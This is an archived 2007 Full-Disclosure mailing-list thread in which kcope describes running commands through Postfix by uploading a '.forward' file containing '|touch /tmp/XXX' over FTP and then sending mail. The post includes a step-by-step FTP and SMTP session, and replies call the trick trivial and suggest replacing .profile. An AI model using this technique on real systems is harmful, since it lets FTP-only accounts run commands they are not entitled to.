lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [<thread-prev] [thread-next>] [day] [month] [year] [list] 
Date: Fri, 14 Dec 2007 15:39:28 -0500
From: Epic <epic@...k3r.com>
To: "Adam N" <interfect@...il.com>
Cc: kcope <kingcope@....net>, full-disclosure@...ts.grok.org.uk
Subject: Re: Small Design Bug in Postfix - REMOTE

And why not replace .profile in that home directory and await the next
login?

This "exploit" is pretty basic and in fact write access to a ~ through FTP
could be used in many ways to "exploit" the machine.

I see no real issue here...



On 12/14/07, Adam N <interfect@...il.com> wrote:
>
> No, the idea is that you are a user with no login access, only FTP.
> By doing this, you get shell access (with sane privileges, thankfully)
> when you're supposed to only have FTP.
>
> On Dec 13, 2007 2:34 PM, Fredrick Diggle < fdiggle@...il.com> wrote:
>
> > You have write perms on a users home directory and this was the best way
> > you could come up with to execute commands? Please send me details on your
> > recipe for boiled water. Be sure to gzip it though as I imagine it is
> > several pages long.
> >
> > YAY!
> >
> >
> > On Dec 13, 2007 2:18 PM, kcope <kingcope@....net> wrote:
> >
> > > Small Design Bug in Postfix - REMOTE
> > >
> > > There's a small issue on how Postfix forwards mails.
> > > A user can have a .forward file in her home directory.
> > > Inside this file she can specifiy an alternative recipient
> > > or use aliasing to execute commands when mail is received.
> > > >From the manpage ALIASES(5)
> > > "aliases - Postfix local alias database format"
> > >
> > > |command
> > >              Mail is piped into command. Commands  that  contain
> > >              special  characters,  such as whitespace, should be
> > >              enclosed between double quotes.  See  local(8)  for
> > >              details of delivery to command.
> > >
> > >              When the command fails, a limited amount of command
> > >              output is mailed back  to  the  sender.   The  file
> > >              /usr/include/sysexits.h  defines  the expected exit
> > >              status codes. For example, use "|exit 67" to  simu-
> > >              late  a  "user  unknown"  error,  and  "|exit 0" to
> > >              implement an expensive black hole.
> > >
> > > This is fine since postfix properly drops privileges before
> > > executing the command.
> > > The Problem with executing commands via .forward files is that
> > > if someone manages to place a file into ones home directory and
> > > just sends a file to the mailserver she can execute commands
> > > even when she's not supposed to or does not have the privileges.
> > >
> > > Here is an example exploitation session, the user 'rootkey'
> > > only has ftp access with write permissions and no other privileges
> > > than that.
> > >
> > > Login to FTP server
> > > >telnet box 21
> > > >USER rootkey
> > > >PASS rootkey123
> > > <logged in
> > >
> > > Put .forward file with following contents into the home directory of
> > > user 'rootkey'.
> > >
> > > ---snip---
> > > |touch /tmp/XXX
> > > ---snip---
> > >
> > > >put .forward
> > >
> > > Now send an email to user rootkey.
> > >
> > > >telnet box 25
> > > >mail from: rootkey
> > > >rcpt to: rootkey
> > > >data
> > > >.
> > >
> > > RESULT:
> > >
> > > kcope@box:~$ ls /tmp/testXXX
> > > /tmp/testXXX
> > >
> > >
> > > signed,
> > >
> > > - -kcope/2007
> > >
> > > --
> > > GMX FreeMail: 1 GB Postfach, 5 E-Mail-Adressen, 10 Free SMS.
> > > Alle Infos und kostenlose Anmeldung: http://www.gmx.net/de/go/freemail
> > >
> > >
> > > _______________________________________________
> > > Full-Disclosure - We believe in it.
> > > Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> > > Hosted and sponsored by Secunia - http://secunia.com/
> > >
> >
> >
> >
> > _______________________________________________
> > Full-Disclosure - We believe in it.
> > Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> > Hosted and sponsored by Secunia - http://secunia.com/
> >
>
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>

Content of type "text/html" skipped

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ